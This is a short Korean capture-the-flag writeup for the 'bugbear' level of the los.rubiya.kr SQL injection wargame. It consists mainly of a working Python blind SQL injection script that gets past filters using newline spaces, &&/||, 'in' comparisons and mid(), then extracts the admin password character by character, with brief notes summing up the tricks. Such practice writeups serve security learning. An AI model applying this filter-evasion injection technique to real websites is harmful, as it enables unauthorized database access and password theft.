해킹/writeup
los.rubiya.kr - bugbear
rmagur1203
2021. 8. 29. 01:15
import requests
pw = ""
cookie = {"PHPSESSID": "bs5vokabo2qae2ome4934v09gr"}
page = "bugbear_19ebf8c8106a5323825b5dfa1b07ac1f"
code = '0||id%0ain%0a("admin")'
space = '%0a'
andsign = '%26%26'
equal = 'in'
_substr = 'mid'
_ascii = 'ord'
length = 0
print("find length")
for i in range(1, 32):
url = f"https://los.rubiya.kr/chall/{page}.php?no=" + \
f'{code}{space}{andsign}{space}length(pw){space}{equal}{space}({str(i)})'
print(url)
res = requests.get(url, cookies=cookie)
if "Hello admin" in res.text:
length = i
print(i)
break;
print("find password")
for i in range(1, length + 1):
for j in range(32, 128):
ch = chr(j).replace('"', '\\"')
url = f"https://los.rubiya.kr/chall/{page}.php?no=" + \
f'{code}{space}{andsign}{space}{_substr}(pw,{str(i)},1){space}{equal}{space}("{ch}")'
print(url)
res = requests.get(url, cookies=cookie)
if "Hello admin" in res.text:
pw += chr(j)
print(pw)
break
ord 빼버리고 그냥 문자열이랑 비교하고
비교는 in 으로 하고,
스페이스바는 \n 개행으로 하고
and와 or은 &&와 ||로 쓴다.
728x90